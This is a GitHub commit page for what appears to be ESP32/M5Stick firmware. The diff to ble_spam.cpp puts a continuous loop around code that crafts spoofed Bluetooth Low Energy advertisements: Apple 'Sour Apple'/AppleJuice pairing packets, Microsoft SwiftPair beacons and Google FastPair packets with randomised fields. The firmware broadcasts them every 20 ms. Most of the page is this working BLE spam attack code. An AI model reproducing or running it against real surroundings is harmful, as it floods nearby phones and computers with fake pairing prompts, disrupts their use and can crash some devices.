Skip to content

Commit

Permalink
added apple data send and loop
Browse files Browse the repository at this point in the history
  • Loading branch information
@pr3y
pr3y committed May 12, 2024
1 parent 3964867 commit a33f5ae
Show file tree
Hide file tree
Showing 2 changed files with 132 additions and 157 deletions.
287 changes: 131 additions & 156 deletions src/ble_spam.cpp
View file
Original file line number Diff line number Diff line change
Expand Up @@ -265,187 +265,162 @@ BLEAdvertising *pAdvertising;

/**********************************************************************
** Function: aj_adv
** spams BLE
** spams BLE from choice
**********************************************************************/
//TODO: add main loop to continue advertising
void aj_adv(int ble_choice){
bool rstOverride;
tft.fillScreen(TFT_BLACK);
bool rstOverride = true;
bool swiftPair;
bool androidPair;
bool sourApple;
bool maelstrom;
int advtime;

switch(ble_choice){
case 0:
data = Airpods;
sourApple = true;
displayRedStripe("Applejuice");
delay(500);
break;
case 1:
swiftPair = true;
displayRedStripe("SwiftPair");
delay(500);
break;
case 2:
androidPair = true;
displayRedStripe("AndroidPair");
delay(500);
break;
case 3:
sourApple = true;
data = AppleTVPair;
displayRedStripe("SourApple");
delay(500);
break;
case 4:
maelstrom = true;
displayRedStripe("Maelstrom");
delay(500);
break;
}
rstOverride = true;
if (sourApple || swiftPair || androidPair || maelstrom){
delay(20); // 20msec delay instead of ajDelay for SourApple attack
advtime = 0; // bypass ajDelay counter
}
if (millis() > advtime ){
advtime = millis();
pAdvertising->stop(); // This is placed here mostly for timing.
// It allows the BLE beacon to run through the loop.
BLEAdvertisementData oAdvertisementData = BLEAdvertisementData();
if (sourApple){
Serial.print("advertising");
// Some code borrowed from RapierXbox/ESP32-Sour-Apple
// Original credits for algorithm ECTO-1A & WillyJL
uint8_t packet[17];
uint8_t size = 17;
uint8_t i = 0;
packet[i++] = size - 1; // Packet Length
packet[i++] = 0xFF; // Packet Type (Manufacturer Specific)
packet[i++] = 0x4C; // Packet Company ID (Apple, Inc.)
packet[i++] = 0x00; // ...
packet[i++] = 0x0F; // Type
packet[i++] = 0x05; // Length
packet[i++] = 0xC1; // Action Flags
const uint8_t types[] = { 0x27, 0x09, 0x02, 0x1e, 0x2b, 0x2d, 0x2f, 0x01, 0x06, 0x20, 0xc0 };
packet[i++] = types[rand() % sizeof(types)]; // Action Type
esp_fill_random(&packet[i], 3); // Authentication Tag
i += 3;
packet[i++] = 0x00; // ???
packet[i++] = 0x00; // ???
packet[i++] = 0x10; // Type ???
esp_fill_random(&packet[i], 3);
oAdvertisementData.addData(std::string((char *)packet, 17));
for (int i = 0; i < sizeof packet; i ++) {
Serial.printf("%02x", packet[i]);
}
Serial.println("");
} else if (swiftPair) {
const char* display_name = generateRandomName();
Serial.printf(display_name);
uint8_t display_name_len = strlen(display_name);
uint8_t size = 7 + display_name_len;
uint8_t* packet = (uint8_t*)malloc(size);
uint8_t i = 0;
packet[i++] = size - 1; // Size
packet[i++] = 0xFF; // AD Type (Manufacturer Specific)
packet[i++] = 0x06; // Company ID (Microsoft)
packet[i++] = 0x00; // ...
packet[i++] = 0x03; // Microsoft Beacon ID
packet[i++] = 0x00; // Microsoft Beacon Sub Scenario
packet[i++] = 0x80; // Reserved RSSI Byte
for (int j = 0; j < display_name_len; j++) {
packet[i + j] = display_name[j];
}
for (int i = 0; i < size; i ++) {
Serial.printf("%02x", packet[i]);
}
Serial.println("");

i += display_name_len;
oAdvertisementData.addData(std::string((char *)packet, size));
free(packet);
free((void*)display_name);
} else if (androidPair) {
Serial.print("spamming adv");
uint8_t packet[14];
uint8_t i = 0;
packet[i++] = 3; // Packet Length
packet[i++] = 0x03; // AD Type (Service UUID List)
packet[i++] = 0x2C; // Service UUID (Google LLC, FastPair)
packet[i++] = 0xFE; // ...
packet[i++] = 6; // Size
packet[i++] = 0x16; // AD Type (Service Data)
packet[i++] = 0x2C; // Service UUID (Google LLC, FastPair)
packet[i++] = 0xFE; // ...
const uint32_t model = android_models[rand() % android_models_count].value; // Action Type
packet[i++] = (model >> 0x10) & 0xFF;
packet[i++] = (model >> 0x08) & 0xFF;
packet[i++] = (model >> 0x00) & 0xFF;
packet[i++] = 2; // Size
packet[i++] = 0x0A; // AD Type (Tx Power Level)
packet[i++] = (rand() % 120) - 100; // -100 to +20 dBm

oAdvertisementData.addData(std::string((char *)packet, 14));
for (int i = 0; i < sizeof packet; i ++) {
Serial.printf("%02x", packet[i]);
}
Serial.println("");
} else {
Serial.print("ADV");
if (deviceType >= 18){
oAdvertisementData.addData(std::string((char*)data, sizeof(AppleTVPair)));
for(;;){
if (sourApple || swiftPair || androidPair || maelstrom){
delay(20); // 20msec delay instead of ajDelay for SourApple attack
advtime = 0; // bypass ajDelay counter
}
if (millis() > advtime ){
advtime = millis();
pAdvertising->stop(); // This is placed here mostly for timing.
// It allows the BLE beacon to run through the loop.
BLEAdvertisementData oAdvertisementData = BLEAdvertisementData();
if (sourApple){
Serial.print("advertising");
// Some code borrowed from RapierXbox/ESP32-Sour-Apple
// Original credits for algorithm ECTO-1A & WillyJL
uint8_t packet[17];
uint8_t size = 17;
uint8_t i = 0;
packet[i++] = size - 1; // Packet Length
packet[i++] = 0xFF; // Packet Type (Manufacturer Specific)
packet[i++] = 0x4C; // Packet Company ID (Apple, Inc.)
packet[i++] = 0x00; // ...
packet[i++] = 0x0F; // Type
packet[i++] = 0x05; // Length
packet[i++] = 0xC1; // Action Flags
const uint8_t types[] = { 0x27, 0x09, 0x02, 0x1e, 0x2b, 0x2d, 0x2f, 0x01, 0x06, 0x20, 0xc0 };
packet[i++] = types[rand() % sizeof(types)]; // Action Type
esp_fill_random(&packet[i], 3); // Authentication Tag
i += 3;
packet[i++] = 0x00; // ???
packet[i++] = 0x00; // ???
packet[i++] = 0x10; // Type ???
esp_fill_random(&packet[i], 3);
oAdvertisementData.addData(std::string((char *)packet, 17));
for (int i = 0; i < sizeof packet; i ++) {
Serial.printf("%02x", packet[i]);
}
} else if (swiftPair) {
const char* display_name = generateRandomName();
Serial.printf(display_name);
uint8_t display_name_len = strlen(display_name);
uint8_t size = 7 + display_name_len;
uint8_t* packet = (uint8_t*)malloc(size);
uint8_t i = 0;
packet[i++] = size - 1; // Size
packet[i++] = 0xFF; // AD Type (Manufacturer Specific)
packet[i++] = 0x06; // Company ID (Microsoft)
packet[i++] = 0x00; // ...
packet[i++] = 0x03; // Microsoft Beacon ID
packet[i++] = 0x00; // Microsoft Beacon Sub Scenario
packet[i++] = 0x80; // Reserved RSSI Byte
for (int j = 0; j < display_name_len; j++) {
packet[i + j] = display_name[j];
}
for (int i = 0; i < size; i ++) {
Serial.printf("%02x", packet[i]);
}
Serial.println("");

i += display_name_len;
oAdvertisementData.addData(std::string((char *)packet, size));
free(packet);
free((void*)display_name);
} else if (androidPair) {
Serial.print("spamming adv");
uint8_t packet[14];
uint8_t i = 0;
packet[i++] = 3; // Packet Length
packet[i++] = 0x03; // AD Type (Service UUID List)
packet[i++] = 0x2C; // Service UUID (Google LLC, FastPair)
packet[i++] = 0xFE; // ...
packet[i++] = 6; // Size
packet[i++] = 0x16; // AD Type (Service Data)
packet[i++] = 0x2C; // Service UUID (Google LLC, FastPair)
packet[i++] = 0xFE; // ...
const uint32_t model = android_models[rand() % android_models_count].value; // Action Type
packet[i++] = (model >> 0x10) & 0xFF;
packet[i++] = (model >> 0x08) & 0xFF;
packet[i++] = (model >> 0x00) & 0xFF;
packet[i++] = 2; // Size
packet[i++] = 0x0A; // AD Type (Tx Power Level)
packet[i++] = (rand() % 120) - 100; // -100 to +20 dBm

oAdvertisementData.addData(std::string((char *)packet, 14));
for (int i = 0; i < sizeof packet; i ++) {
Serial.printf("%02x", packet[i]);
}
Serial.println("");
} else {
oAdvertisementData.addData(std::string((char*)data, sizeof(Airpods)));
Serial.print("ADV");
if (deviceType >= 18){
oAdvertisementData.addData(std::string((char*)data, sizeof(AppleTVPair)));
} else {
oAdvertisementData.addData(std::string((char*)data, sizeof(Airpods)));
}
for (int i = 0; i < sizeof(Airpods); i ++) {
Serial.printf("%02x", data[i]);
}
Serial.println("");
}
for (int i = 0; i < sizeof(Airpods); i ++) {
Serial.printf("%02x", data[i]);
}
Serial.println("");

pAdvertising->setAdvertisementData(oAdvertisementData);
pAdvertising->start();
#if defined(M5LED)
digitalWrite(M5LED, M5LED_ON); //LED ON on Stick C Plus
delay(10);
digitalWrite(M5LED, M5LED_OFF); //LED OFF on Stick C Plus
#endif
}

pAdvertising->setAdvertisementData(oAdvertisementData);
pAdvertising->start();
#if defined(M5LED)
digitalWrite(M5LED, M5LED_ON); //LED ON on Stick C Plus
delay(10);
digitalWrite(M5LED, M5LED_OFF); //LED OFF on Stick C Plus
#endif
}
if (checkSelPress()) {
if (checkSelPress()) {

sourApple = false;
swiftPair = false;
maelstrom = false;
pAdvertising->stop(); // Bug that keeps advertising in the background. Oops.
delay(250);
}
sourApple = false;
swiftPair = false;
maelstrom = false;
pAdvertising->stop(); // Bug that keeps advertising in the background. Oops.
delay(250);
}

}
}








































2 changes: 1 addition & 1 deletion src/main.cpp
View file
Original file line number Diff line number Diff line change
Expand Up @@ -188,7 +188,7 @@ void loop() {
break;
case 1: // BLE
options = {
{"AppleJuice", [=]() { aj_adv(1); }},
{"AppleJuice", [=]() { aj_adv(0); }},
{"SwiftPair", [=]() { aj_adv(1); }},
{"Android Spam", [=]() { aj_adv(2);}},
{"SourApple", [=]() { aj_adv(3); }},
Expand Down

0 comments on commit a33f5ae

Please sign in to comment.